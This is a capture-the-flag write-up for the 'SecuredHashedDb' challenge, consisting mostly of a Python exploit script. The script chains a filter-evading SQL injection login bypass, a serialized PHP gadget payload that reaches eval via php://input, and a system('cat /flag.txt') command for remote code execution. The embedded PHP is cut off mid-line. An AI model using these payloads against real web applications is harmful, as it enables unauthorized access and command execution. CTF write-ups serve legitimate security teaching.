Writeup for SecuredHashedDb  
To get the admin name "adminRoot00988", simply edit the payload and make a
sleep based sql injection  
```  
import requests  
r = requests.Session()  
front = "https://app.shdb.challs.dantectf.it"  
pl = 'username: \\\\\' UNION (SELselectECT "3", "adminRoot00988",
"$2y$10$UMHmuj7Pq.UIq3bhLf9MZOvCBz.NKkkH18vPmIUYmZwoxGVb0yLmy"); -- -'  
r.post(f"{front}/login", data={'username': pl, 'password': 'enzo'})  
"""  
locationFile);  
preg_match('/[^;]+;$/', $content_of_the_file, $matches);  
return eval($matches[0]);  
}  
}  
class MD5DBEngine {  
private $HashString = "";  
private $objArray = array();  
public function __construct() {  
$this->objArray['obj'] = new Visualizer();  
}  
}  
$v = new MD5DBEngine();  
echo(base64_encode(serialize($v)));  
?>  
"""  
data = {'key': 'md5Searcher', 'value':
'TzoxMToiTUQ1REJFbmdpbmUiOjI6e3M6MjM6IgBNRDVEQkVuZ2luZQBIYXNoU3RyaW5nIjtzOjA6IiI7czoyMToiAE1ENURCRW5naW5lAG9iakFycmF5IjthOjE6e3M6Mzoib2JqIjtPOjEwOiJWaXN1YWxpemVyIjoxOntzOjI0OiIAVmlzdWFsaXplcgBsb2NhdGlvbkZpbGUiO3M6MTE6InBocDovL2lucHV0Ijt9fX0'}  
ok = r.post(f"{front}/getSignedCookie", data=data)  
token =
ok.cookies._cookies["app.shdb.challs.dantectf.it"]["/"]["magicToken"].value  
b = requests.Session()  
back = "https://backend.shdb.challs.dantectf.it"  
b.cookies.set("decodeMyJwt", token, domain="backend.shdb.challs.dantectf.it")  
print(b.post(f"{back}/index.php", data="system('cat /flag.txt');").text)  
```